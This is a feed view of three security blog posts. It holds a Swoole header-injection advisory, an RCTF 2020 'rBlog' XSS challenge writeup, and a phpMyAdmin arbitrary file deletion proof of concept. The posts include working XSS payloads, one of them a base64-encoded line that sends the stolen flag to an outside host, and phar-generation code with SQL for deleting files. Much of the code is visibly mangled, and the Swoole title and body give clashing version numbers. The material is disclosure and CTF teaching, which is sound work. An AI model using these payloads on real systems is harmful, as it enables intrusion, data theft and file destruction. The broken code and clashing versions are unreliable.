普通视图

昨天以前crblog

crblog
HTTP Response Header Injection in Swoole<=4.8.2
<h1>HTTP Response Header Injection in Swoole<=4.5.2</h1> 发表于 2020 年 8 月 6 日 <h2>描述</h2> 在 Swoole <= 4.5.2 中，<code>Swoole\Http\Response</code> 类的 <code>header()/rawCookie()/redirect()</code> 方法在设置 HTTP 响应头时没有对换行符<code>\r</code>、<code>\n</code> 和空字符 <code>\x00</code>进行检查。如果开发者在调用以上方法时传入了用户可控的数据，攻击者可以利用该漏洞伪造任意 Response Header 和 Response Body。 <h2>典型场景</h2&
2020年8月5日 23:54

HTTP Response Header Injection in Swoole<=4.8.2

2020年8月5日 23:54

<h1>HTTP Response Header Injection in Swoole<=4.5.2</h1> 发表于 2020 年 8 月 6 日 <h2>描述</h2> 在 Swoole <= 4.5.2 中，<code>Swoole\Http\Response</code> 类的 <code>header()/rawCookie()/redirect()</code> 方法在设置 HTTP 响应头时没有对换行符<code>\r</code>、<code>\n</code> 和空字符 <code>\x00</code>进行检查。如果开发者在调用以上方法时传入了用户可控的数据，攻击者可以利用该漏洞伪造任意 Response Header 和 Response Body。 <h2>典型场景</h2> <code>rawCookie</code> 设置Cookie <pre><code class="php">if(isset($request->get['lang'])){ $response->rawCookie('lang', $request->get['lang']); } </code></pre> <code>redirect</code> 重定向 <pre><code class="php">if(isset($request->get['redirect_uri'])){ $response->redirect($request->get['redirect_uri']); $response->end('Redirecting...'); } </code></pre> <code>header</code> 设置响应头 <pre><code class="php">if(isset($request->get['redirect_uri'])){ $response->status(302); $response->header('Location', $request->get['redirect_uri']); $response->end('Redirecting...'); } </code></pre> <h2>利用方式</h2> <ol> <li>伪造 <code>Set-Cookie</code> 响应头可以往当前域和父域写入任意 Cookie</li> </ol> <img alt="image.png" src="https://blogstatic-1252090343.picgz.myqcloud.com/200806/01.png" /> <ol> <li>伪造 <code>Content-Length</code>和<code>Content-Type</code>，并通过两次换行伪造 Response Body，实现内容欺骗(Content Spoofing) 或 XSS</li> </ol> <img alt="image.png" src="https://blogstatic-1252090343.picgz.myqcloud.com/200806/02.png" /> <ol> <li>在重定向的场景中，即使 HTTP 状态码为 3xx ，攻击者也可以通过将 <code>Location</code> 头设置为空，使得 Chrome 继续渲染 Response Body</li> </ol> <img alt="image.png" src="https://blogstatic-1252090343.picgz.myqcloud.com/200806/03.png" /> <h2>时间线</h2> <ul> <li>8月3日通过邮件反馈给 team@swoole.com</li> <li>8月4日 <a href="https://github.com/swoole/swoole-src/pull/3539">第一次修复</a></li> <li>8月6日 <a href="https://github.com/swoole/swoole-src/pull/3545">完成修复且合并到主分支</a></li> </ul> <h2>扩展阅读</h2> https://portswigger.net/kb/issues/00200200_http-response-header-injection

RCTF 2020 rBlog writeup

crblog

2020年5月31日 23:54

<h1>RCTF 2020 rBlog writeup</h1> 发表于 2020 年 6 月 1 日 <img alt="" src="//blogstatic-1252090343.picgz.myqcloud.com/200601/r01.png" /> <a href="https://drive.google.com/file/d/1Z10Qk8-EMqcYs4zeYmExu6-1HBbrlOaX/view?usp=sharing">source code</a> Apparently the challenge "rBlog" is based on a blog service. Going through the provided source code, it's easy to determine following interfaces: <ul> <li>User registration is closed, so the login and logout functions only work for admin(XSS bot);</li> <li><code>highlight_word</code> function in posts page takes user input and makes changes to DOM accordingly;</li> <li>Anonymous user can create a feedback which can only be viewed by authenticated user(XSS bot);</li> <li>Flag is in <code>/posts/flag</code>, also for authenticated user only.</li> </ul> Firstly let's take a look into the feedback function. <code>``js= for (let i of resp.data) { let params = new URLSearchParams() params.set('highlight', i.highlight_word) if (i.link.includes('/') || i.link.includes('\\')) { continue; // bye bye hackers uwu } let a = document.createElement('a') a.href =</code>${i.link}?${params.toString()}<code>a.text =</code>${i.ip}: ${a.href}` feedback_list.appendChild(a) feedback_list.appendChild(document.createElement('br')) } feedback_list.innerHTML = DOMPurify.sanitize(feedback_list.innerHTML) <pre><code> A new feedback is sent in this way: ```http= POST /posts/feedback HTTP/1.1 Host: rblog.rctf2020.rois.io Connection: close Content-Length: 61 Content-Type: application/x-www-form-urlencoded postid=8dfaa99d-da9b-4e90-954e-0f97a6917b91&highlight=writeup </code></pre> When admin visits <code>/posts/feedback</code> to view the feedbacks, <code><a></code> tags is created like: <pre><code class="html"><a href="8dfaa99d-da9b-4e90-954e-0f97a6917b91?highlight=writeup">harmless texts...</a> </code></pre> Since the feedback page is on route <code>/pages/feedback</code>, the relative URL will surely bring the admin to <code>/pages/8dfaa99d-da9b-4e90-954e-0f97a6917b91?highlight=writeup</code>, the right page. While the only restriction here is the <code>postid</code> should never contain any <code>/</code> or <code>\</code>, technically we now are able to create: <pre><code class="html"><a href="ANYTHING_BUT_SLASHES_OR_BACKSLASHES?highlight=ANYTHING">harmless texts...</a> </code></pre> Generally we would come up with the idea of using <code>javascript:</code> to build a classical XSS here, but the DOM is sanitized by DOMPurify, no chance for <code>javascript:</code> today. As for <code>data:html;base64,...</code>, Chrome would refuses to navigate from http/https to <code>data:</code> via <code><a></code> tag. So let's just leave it here for now and move on to the highlight_word function: <code>``js= function highlight_word() { u = new URL(location) hl = u.searchParams.get('highlight') || '' if (hl) { // ban html tags if (hl.includes('<') || hl.includes('>') || hl.length > 36) { u.searchParams.delete('highlight') history.replaceState('', '', u.href) alert('⚠️ illegal highlight word') } else { // why the heck this only highlights the first occurrence? stupid javascript 😠 // content.innerHTML = content.innerHTML.replace(hl,</code>${hl}<code>) hl_all = new RegExp(hl, 'g') replacement =</code>${hl}` post_content.innerHTML = post_content.innerHTML.replace(hl_all, replacement) let b = document.querySelector('b[class=hl]') if (b) { typeof b.scrollIntoViewIfNeeded === "function" ? b.scrollIntoViewIfNeeded() : b.scrollIntoView() } } } } <pre><code> This function extracts the param `highlight` from current URL into variable `hl`, and replace all the occurrences in DOM with styled `` tags. Zszz(众所周知/As we all know), if we pass a string as the first argument to `String.replace()`, only the first match will be replaced. To replace all matches, we need to pass a RegExp object with `g` (global) flag. ![](//blogstatic-1252090343.picgz.myqcloud.com/200601/r02.png) This is exactly how this highlighting function has been coded. We are able to modify the DOM with `highlight` param: ```js post_content.innerHTML.replace(/YOUR_HIGHLIGHT_WORDS/g, 'YOUR_HIGHLIGHT_WORDS') </code></pre> And here comes the tricky part: other than plain texts, the "replacement" could be a valid RegExp, which means we can do content injections like this: <img alt="" src="//blogstatic-1252090343.picgz.myqcloud.com/200601/r03.png" /> The RegExp matches word <code>do</code> and replaces it with <code>do|LUL_CONTENT_INJECTION</code>. But how do we inject HTML tags? <code><</code> or <code>></code> are not allowed in <code>hl</code> ! If you ever read the docs of <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace">String.prototype.replace()</a>, this table should raise your eyebrows: <img alt="" src="//blogstatic-1252090343.picgz.myqcloud.com/200601/r04.png" /> You can really use those replacement patterns to introduce disallowed characters: <img alt="" src="//blogstatic-1252090343.picgz.myqcloud.com/200601/r05.png" /> I crafted this payload with 19 out of 36 chars could be filled with javascript codes: <pre><code>$`style%20onload=ZZZZZZZZZZZZZZZZZZZ%0a| </code></pre> <img alt="" src="//blogstatic-1252090343.picgz.myqcloud.com/200601/r06.png?" /> Now we get a reflected-XSS in highlight param, but obviously 36 chars are not enough to carry our payload to fetch the flag. So we need another legit trick here. You can actually find an interesting behavior with following codes: <img alt="" src="//blogstatic-1252090343.picgz.myqcloud.com/200601/r07.png" /> <img alt="" src="//blogstatic-1252090343.picgz.myqcloud.com/200601/r08.png" /> If the href attribute starts with a different HTTP(s) protocol the current location is loaded with, it will not be recognized as a relative URL. Finally we can create a feedback with postid <code>http:DOMAIN_OR_IP:PORT</code> which would lead the XSS bot to our own HTTP server when he clicks the <code><a></code> tag. Smuggle our payload in <code>window.name</code> and redirect to the reflected-XSS to <code>eval(top.name)</code>. <img alt="" src="//blogstatic-1252090343.picgz.myqcloud.com/200601/r09.png?" /> <hr /> Update: Some came up with this unintended solution exploiting the <code>u.search</code> and a longer <code>postid</code>: <pre><code>POST /posts/feedback HTTP/1.1 Host: rblog.rctf2020.rois.io Connection: close Content-Length: 271 Content-Type: application/x-www-form-urlencoded postid=205f4402-efeb-4200-97a8-808a3159157f?`(eval(atob(`ZmV0Y2goJ2ZsYWcnKS50aGVuKHI9PntyLnRleHQoKS50aGVuKHQ9Pntsb2NhdGlvbj0nLy9jZjQzZGZmZS5uMHAuY28vJytlc2NhcGUodCl9KX0p`)))%3b`%26highlight=$%2526style%2520onload=eval(%2522%2560%2522%252Bu.search)%250A|.%26`#&highlight=1 </code></pre> <pre><code>// prompt('500IQ') https://rblog.rctf2020.rois.io/posts/205f4402-efeb-4200-97a8-808a3159157f?`(prompt(`500IQ`));`&highlight=$%26style%20onload=eval(%22%60%22%2Bu.search)%0A|.&`# </code></pre>

Arbitrary file deletion in phpMyAdmin <= 4.8.4

crblog

2019年1月25日 23:54

<h1>Arbitrary file deletion in phpMyAdmin <= 4.8.4</h1> 发表于 2019 年 1 月 26 日 <h3>Description</h3> This vulnerability allows a logged-in user to delete arbitrary file via loading a crafted phar file by <code>LOAD DATA LOCAL INFILE</code>. Neither <code>UploadDir</code> nor <code>SaveDir</code> in config will take effect. To exploit this vulnerability, attacker must be able to upload a crafted file to the server hosting phpMyAdmin. The content of file is essential, while the filename is not our concern. There are several ways to create a file on the server: - <code>SELECT ... INTO OUTFILE ...</code>, if the phpMyAdmin and MySQL are on the same server; - "Export as CSV" in phpMyAdmin, if <code>$cfg['SaveDir']</code> is set; - Upload via other php applications (e.g. WordPress), if any; - Exploit <code>/tmp/phpXXXXXX</code> temporary files. By loading a local file through "phar://" stream wrapper, an unserialization would be performed while parsing the file. Magic methods like <code>__destruct</code> and <code>__wakeup</code> from any class in the context can be triggered. And I found <code>PhpMyAdmin\File</code> a perfect exploit gadget in phpMyAdmin, which deletes a file in <code>__destruct</code> method. To generate exploit.phar: ```php= <?php include 'pma484/libraries/classes/File.php'; $o = new PhpMyAdmin\File(); $o->_name='/var/www/html/file_to_delete.txt'; $o->_is_temp = True; $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->addFromString('test', 'test'); $phar->setStub('<?php __HALT_COMPILER(); ? >'); $phar->setMetadata($o); $phar->stopBuffering(); <pre><code> More details about this attack method are available here: [File Operation Induced Unserialization via the “phar://” Stream Wrapper - Sam Thomas](https://i.blackhat.com/us-18/Thu-August-9/us-18-Thomas-Its-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It-wp.pdf) ### To reproduce 1. login to phpMyAdmin 2. upload [exploit.phar](https://gist.github.com/chromium1337/61688a74423fdad0c353663aadd2b23b#file-exploit_php5-phar) to server 3. execute SQL: ```SQL LOAD DATA LOCAL INFILE 'phar:///path/to/exploit.phar/1' INTO TABLE `any_exist_table` </code></pre> <img alt="" src="https://i.imgur.com/lmNVN7H.gif" />